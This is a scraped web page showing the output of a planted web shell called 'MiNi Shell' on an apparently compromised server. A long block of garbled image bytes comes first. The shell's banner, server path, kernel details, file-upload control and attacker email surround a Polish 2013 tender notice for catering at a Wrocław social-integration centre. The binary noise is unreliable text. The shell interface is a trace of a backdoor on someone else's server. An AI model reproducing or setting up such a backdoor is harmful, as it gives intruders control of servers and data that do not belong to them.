JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130114/20122-N-2013.html

<p class="kh_header"><b>Wrocław: Świadczenie usług cateringowych oraz sukcesywna dostawa poczęstunku dla uczestników projektu Centrum Aktywnych realizowanego przez Centrum Integracji Społecznej w ramach Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 20122 - 2013; data zamieszczenia: 14.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Integracji Społecznej , ul. Strzegomska 49, 53-611 Wrocław, woj. dolnośląskie, tel. 71 782 35 11, faks 71 782 35 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.cis.wroclaw.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług cateringowych oraz sukcesywna dostawa poczęstunku dla uczestników projektu Centrum Aktywnych realizowanego przez Centrum Integracji Społecznej w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest Świadczenie usług cateringowych oraz sukcesywna dostawa poczęstunku dla uczestników projektu Centrum Aktywnych realizowanego przez Centrum Integracji Społecznej w ramach Programu Operacyjnego Kapitał Ludzki.
2.	Przedmiot zamówienia określony w punkcie 1 składa się z 2 części, realizowanych w okresach II-V 2013, VII-X 2013, XII 2013-III 2014, V-VIII 2014, X 2014 - I 2015, III-VI 2015.
3.	Zamawiający nie dopuszcza składania ofert częściowych.

PRZEDMIOT ZAMÓWIENIA OBEJMUJE NASTĘPUJĄCE CZĘŚCI:

Część I - Przygotowanie i dostawa ciepłych posiłków dla uczestników projektu Centrum Aktywnych
a)	Przedmiotem części I zamówienia jest przygotowanie i dostawa ciepłych posiłków składających się z zupy i drugiego dania z dodatkiem warzywnym (surówki) oraz sok lub kompotu o następujących gramaturach:
ziemniaki lub zamiennik: ryż, kasza, makaron - minimum 300g, mięso lub ryba - minimum 150g, surówka - minimum 150g, kompot lub sok - minimum 250ml, zupa - minimum 300g.
b)	Posiłki powinny zostać przygotowane zgodnie z wymogami sztuki kulinarnej i normami sanitarnymi żywienia zbiorowego. Muszą też być sporządzone ze świeżych produktów spożywczych posiadających aktualne terminy ważności. Posiłki powinny być wykonane z naturalnych produktów metodą tradycyjną, bez użycia produktów typu instant oraz gotowych produktów garmażeryjnych. 
c)	Wykonawca powinien uwzględnić możliwość dostawy posiłków zgodnie z dietą wegetariańską na życzenie Zamawiającego. Posiłek wegetariański powinien stanowić równowartość ceny jednego posiłku oraz stanowić posiłek dwudaniowy.
d)	Posiłki muszą być przyrządzone w dniu podania i mieć odpowiednią temperaturę, wymaganą dla posiłków obiadowych (t.j. minimum 85 stopni C). 
e)	Posiłki i sposób ich przygotowania powinny być zgodne z odpowiednimi warunkami higieniczno-sanitarnymi oraz spełniać warunki określone w przepisach ustawy z dnia 25.08.2006r. o bezpieczeństwie żywności i żywienia (Dz. U. nr 136, poz. 914).
f)	Zamawiający zastrzega sobie możliwość zamiany ciepłego posiłku na suchy prowiant (bułka z szynką lub serem, drożdżówka, soczek lub woda mineralna, owoc) i stanowić równowartość jednego posiłku. Produkty te muszą być świeże, dobre jakościowo, poporcjowane i zapakowane dla każdego uczestnika.
g)	Terminy i miejsce dostawy posiłków: codziennie od poniedziałku do piątku (z wyłączeniem dni świątecznych, wolnych od pracy) o godzinie 14.30 (lub innej - po uzgodnieniu z Zamawiającym) do siedziby Zamawiającego lub w inne wskazane przez Zamawiającego miejsce w odległości maksymalnie 15 kilometrów od jego siedziby.
h)	Wykonawca zobowiązany jest codziennie w obecności pracownika zamawiającego wydać uczestnikom projektu posiłki.
i)	okres realizacji zamówienia: II-V 2013, VII-X 2013, XII 2013-III 2014, V-VIII 2014, X 2014 - I 2015, III-VI 2015
j)	minimalna ilość posiłków każdego dnia: 5 sztuk. Maksymalna ilość posiłków każdego dnia: 30 sztuk. Maksymalna ilość posiłków przez okres realizacji umowy: 15 120 posiłków.
k)	Wykonawca zostanie każdorazowo poinformowany telefonicznie przez pracownika Zamawiającego o ilości posiłków na dany dzień najpóźniej do godziny 10.00.
l)	Posiłki powinny być przewożone w termosach gastronomicznych, które zapewniają utrzymanie temperatury spożywania potraw oraz posiadają odpowiednie atesty Państwowego Zakładu Higieny lub w inny pojemnikach, naczyniach gwarantujących utrzymanie właściwej temperatury.
m)	W przypadku awarii lub innych nieprzewidzianych zdarzeń Wykonawca jest zobowiązany zapewnić posiłki o nie gorszej jakości na swój koszt.
n)	Do obowiązku Wykonawcy należy także codzienny odbiór pojemników i odpadków pokonsumpcyjnych niezależnie od ich ilości. Zamykane pojemniki na posiłki i odpady stanowią własność Wykonawcy. 
o)	Zamykane pojemniki na posiłki i odpady po obiadach będą zabierane wraz z pojemnikami w dniu dostawy posiłków, maksymalnie do godz. 15.30.
p)	Posiłki powinny być przewożone samochodem dostawczym  dopuszczonym przez SANEPID do przewozu posiłków.  
q)	Dysponenci i kierowcy muszą posiadać aktualne świadectwa zdrowia, decyzje sanitarne na środki transportu i odzież ochronną.
r)	Za ewentualne uchybienia ujawnione w trakcie kontroli np. sanitarnej, wynikające ze świadczonej przez Wykonawcę usługi, której następstwem będą mandaty lub kary, odpowiada Wykonawca. 
s)	Cena posiłków winna zawierać również koszt dowozu posiłków oraz koszt naczyń i sztućców. Wykonawca zadba też o wydawanie, asystowanie podczas konsumpcji  posiłków oraz o czystość pomieszczeń w których wydawane i spożywane będą posiłki (w tym usunięcie resztek).
t)	Wykonawca przed dostarczeniem posiłków do Placówek pobiera próbki żywności zgodnie z rozporządzeniem Ministra Zdrowia z dnia 17.04.2007 r. (Dz. U. 07.80.545).
u)	Zamawiający zastrzega sobie prawo kontroli stosowanych surowców, przebiegu procesów technologicznych oraz norm racji pokarmowych.
v)	Rozliczenia finansowe Wykonawcy usługi z Zamawiającym odbywać się będą na podstawie ilości faktycznie dostarczonych posiłków i ich ceny jednostkowej.
w)	Wynagrodzenie za sukcesywne wykonywanie przedmiotu umowy będzie wypłacane Wykonawcy w terminie 30 dni od daty przyjęcia przez Zamawiającego poprawnie wystawionej faktury VAT wraz z zestawieniem ilościowym wydanych w każdym dniu miesiąca posiłków, za każdy miesiąc świadczonej usługi osobno.
x)	W szczególnie uzasadnionych przypadkach Zamawiający może wystąpić z propozycją wcześniejszego rozliczenia obiadów wydanych w danym miesiącu. 
y)	Posiłki serwowane będą zgodnie z poniższym jadłospisem:
TYDZIEŃ I: PONIEDZIAŁEK - Rosół z makaronem (na wywarze z kurczaka), Ziemniaki, udko z kurczaka smażone, bukiet surówek; WTOREK - Żurek z jajkiem, Ziemniaki, karkówka smażona, bukiet surówek; ŚRODA - Zupa ogórkowa, Kasza gryczana, gulasz wieprzowy, bukiet surówek; CZWARTEK - Kapuśniak 
Ziemniaki, kotlety mielone, bukiet surówek; PIĄTEK - Barszcz czerwony, Ryż z sosem grzybowym, 2 krokiety z kapustą i grzybami, bukiet surówek; TYDZIEŃ II: PONIEDZIAŁEK - Zupa pieczarkowa
Placek po węgiersku, bukiet surówek; WTOREK - Zupa grochowa, Spaghetti bolognese, bukiet surówek; ŚRODA - Zupa pomidorowa z makaronem, Ziemniaki, kotlet schabowy, bukiet surówek; CZWARTEK - Rosół z makaronem (na wywarze z kurczaka), Kluski śląskie z sosem pieczeniowym, devolay; PIĄTEK - Zupa jarzynowa , Ziemniaki, filet z mintaja, bukiet surówek.

Część II - Dostawa poczęstunku dla uczestników projektu Centrum Aktywnych

a)	Dostawa poczęstunku odbywać się w miesięcznych, najpóźniej do 5 dnia danego miesiąca przez okres 24 miesięcy w następujących okresach: 
II-V 2013, VII-X 2013, XII 2013-III 2014, V-VIII 2014, X 2014 - I 2015, III-VI 2015
b)	Poczęstunek dla uczestników projektu na okres jednego miesiąca (dalej: pakiet miesięczny) powinien zawierać minimum:
- 65 kg ciastek mix w opakowaniach 1kg lub 2 kg (ciastka typu: rurki waflowe z nadzieniem, kruche z cukrem, ciastka w polewie czekoladowej, biszkopt z galaretką, wafle o różnych smakach, herbatniki, itp.)
- 30 opakowań kawy rozpuszczalnej po 200g, skład 100% kawy naturalnej
- 10 opakowań kawy mielonej w opakowaniu 500g
- 15 opakowań herbaty czarnej ekspresowej (mieszanka herbat czarnych) po 100 torebek 
- 15 opakowań herbaty owocowej po 20 torebek
- 15 opakowań herbaty zielonej liściastej w opakowaniach minimum 100g
- 60 litrów mleka UHT 2%, opakowanie 1 l
- 18 kg cukru białego sypkiego w opakowaniach papierowych po 1 kg
- 1200 sztuk łyżeczek plastikowych do kawy lub herbaty,
- 130 litrów wody mineralnej, w tym 80 litrów wody mineralnej niegazowanej i 50 litrów wody mineralnej gazowanej, w opakowaniach plastykowych o pojemności min. 1,5 l.
Dostarczany produkty muszą posiadać termin przydatności do spożycia nie krótszy niż 3 miesiące..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1, 55.32.10.00-6, 55.32.00.00-9, 55.32.20.00-3, 55.52.12.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał  co najmniej trzy usługi cateringowe o podobnej randze i charakterze świadczone dla co najmniej 25 osób prze okres nie krótszy niż 3 miesiące, przy założeniu, że usługi świadczone były nie rzadziej niż 3 dni w tygodniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>dokument (np. pełnomocnictwo lub umowa spółki cywilnej, itp.) potwierdzający, iż oferta została podpisana przez osobę/y uprawnioną/e w reprezentowania Wykonawcy, jeżeli nie wynika to z innych dokumentów załączonych do oferty</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - doświadczenie Wykonawcy w prowadzeniu usług cateringowych (w ciągu trzech ostatnich lat) - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.cis.wroclaw.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Integracji Społecznej
ul. Strzegomska 49, 53-611 Wrocław
parter- pokój 3A.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.01.2013 godzina 09:00, miejsce: Centrum Integracji Społecznej
ul. Strzegomska 49, 53-611 Wrocław
parter- sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt Centrum Aktywnych wpółfinansowany ze środkow Unii Europejskiej w ramach EFS - Program Operacyjny Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com